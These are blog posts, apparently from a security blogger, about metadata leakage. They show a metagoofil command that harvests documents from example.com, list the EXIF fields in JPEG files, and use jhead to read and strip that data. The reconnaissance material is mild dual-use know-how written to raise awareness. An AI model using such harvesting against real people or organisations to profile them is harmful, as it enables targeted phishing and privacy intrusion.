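./metagoofil.py -d example.com -f all -l 100 -o report.html -t files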

You can download metagoofil from the official site, although google has changed the format of its search queries and the 1.4b version needs some alterations. For more information take a look at the unofficial fix.

Let’s see Metagoofil in action under a linux OS.

 

 

It is pretty obvious that metadata gathering & extraction is easily accomplished. Recognizing the high security risk of hidden metadata leakage, I began writing a series of articles about the metadata information included in different file types. I recently published the first part about exif jpeg metadata and will continue with details and tools for the others too.

 

DISCLAIMER: I’m not responsible with what you do with this info. This information is for educational purposes only.

 

 

A. Bechtsoudis

Enumerating Metadata: Part1 jpeg files
Sat, 30 Apr 2011

During the information gathering and reconnaissance phases, potential intruders spend a great deal of time learning everything they can about their targets before launching an attack. The gathered information is often crucial for finding a weakness in a system or network and in the users participating in them. Hackers can gather useful information by examining the metadata (data about data) content of files used by the victim user, system or network. In an attempt to enumerate all the possible metadata leakage cases, I will write a series of articles covering different filetypes & file groups. In this first part I examine exif jpeg metadata and how to handle it.

When you take a picture with your cell phone, digital camera or other similar device, a lot more information than just the picture is stored in the file. Depending on the device you use, the stored metadata may include:

    • Time and date picture was taken
    • Camera make and model
    • Integral low-res Exif thumbnail
    • Shutter speed
    • Camera F-stop number
    • Flash used (yes/no)
    • Distance camera was focused at
    • Focal length and calculate 35 mm equivalent focal length
    • Image resolution
    • GPS info (if device is not configured properly)
    • IPTC header
    • XMP data

Spying users and hackers may take advantage of this kind of information to create a starting point for their malicious activities. For example, using the GPS info and the type of camera you own, an attacker may craft a targeted promotional malicious email to compromise your system. Or third parties can gather information about you (vacation places & times, place of living etc) through the images you have published on social networks & blogs.

A lot of tools are capable of reading, altering and removing jpeg metadata. In this article I will use a cross-platform tool named jhead and run it under a linux environment.

Download the jhead source code (or a binary) from the official site and compile it using the makefile (skip the compilation if you downloaded a binary). Now let's see an example output:

$jhead /tmp/IMG_0247.JPG
File name    : /tmp/IMG_0247.JPG
File size    : 866859 bytes
File date    : 2008:03:10 22:48:36
Camera make  : Canon
Camera model : Canon PowerShot A460
Date/Time    : 2008:03:10 16:53:09
Resolution   : 2048 x 1536
Flash used   : No (auto)
Focal length :  5.4mm  (35mm equivalent: 39mm)
CCD width    : 4.93mm
Exposure time: 0.013 s  (1/80)
Aperture     : f/2.8
ISO equiv.   : 80
Whitebalance : Auto
Metering Mode: pattern

You can see that metadata information can be gathered pretty easily. In the worst case scenario you may have a GPS location leakage, as seen in the screenshots at the end of the post.

 

Now let's see how we can prevent this kind of leakage by removing the metadata. In the simplest scenario we can remove all metadata information using jhead. This can be done with the purejpg argument:

$jhead -purejpg /tmp/IMG_0247.JPG

Resulting in:

$jhead /tmp/IMG_0247.JPG
File name    : /tmp/IMG_0247.JPG
File size    : 857529 bytes
File date    : 2011:04:30 20:58:25
Resolution   : 2048 x 1536

jhead offers a lot more options for making advanced changes to jpeg headers, including comment insertion, date & time changes, thumbnail changes, copying the exif header from another image, and more. Type -h to see the available options or read the official documentation. Additionally, jhead can operate on a whole directory, making mass changes to all the jpeg files in it.
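For instance (a quick sketch; consult the official documentation for the full option list):

# strip all metadata from every jpeg in a directory
jhead -purejpg /photos/*.jpg
# set each file's modification time from its exif timestamp
jhead -ft /photos/*.jpg
# replace the jpeg comment field with a fixed string
jhead -cl "sanitized" /photos/*.jpg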

 

And some execution screenshots:

 

To be continued…..

 

A. Bechtsoudis
